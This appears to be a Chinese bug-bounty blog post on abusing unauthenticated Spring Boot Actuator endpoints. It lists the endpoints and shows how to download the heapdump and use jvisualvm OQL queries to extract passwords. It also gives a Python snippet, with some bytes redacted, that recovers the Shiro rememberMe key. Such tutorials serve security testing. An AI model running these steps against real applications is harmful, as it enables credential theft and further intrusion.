欢迎转发，请勿抄袭

        Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块，借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下，如果没有做好相关权限控制，非法用户可通过访问默认的执行器端点（endpoints）来获取应用系统中的监控信息。

        未授权访问可以理解为需要授权才可以访问的页面由于错误的配置等其它原因，导致其它用户可以直接访问，从而引发各种敏感信息泄露。

2、通过报错信息

/dump - 显示线程转储（包括堆栈跟踪）
/autoconfig - 显示自动配置报告
/configprops - 显示配置属性
/trace - 显示最后几条HTTP消息（可能包含会话标识符）
/logfile - 输出日志文件的内容
/shutdown - 关闭应用程序
/info - 显示应用信息
/metrics - 显示当前应用的’指标’信息
/health - 显示应用程序的健康指标
/beans - 显示Spring Beans的完整列表
/mappings - 显示所有MVC控制器映射
/env - 提供对配置环境的访问
/heapdump - 转存堆文件
/restart - 重新启动应用程序
主要使用分析的文件heapdump文件
前期需要访问/env，来确定带星的信息，我们需要读取出来。
http://url/actuator/env

http://url/actuator/heapdump

C:\Program Files\Java\jdk1.8.0_231\bin\jvisualvm.exe

select s from java.lang.String s where /查询字段/.test(s.value.toString())

select s from java.lang.String s where /spring.datasource.druid.stat-view-servlet.login-password/.test(s.value.toString())

select s.value.toString() from java.util.Hashtable$Entry s where /password/.test(s.key.toString())

org.apache.shiro.web.mgt.CookieRememberMeManager

import base64import structdata=struct.pack('<bbbbbbbbbbbbbbbb', -40, 11, -57, -123, -37, 32, 82,-51,5,x,x,-x,x,x,x,x)print(base64.b64encode(data))

5、编写完成之后，使用python执行，获得相关key

往期回顾

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips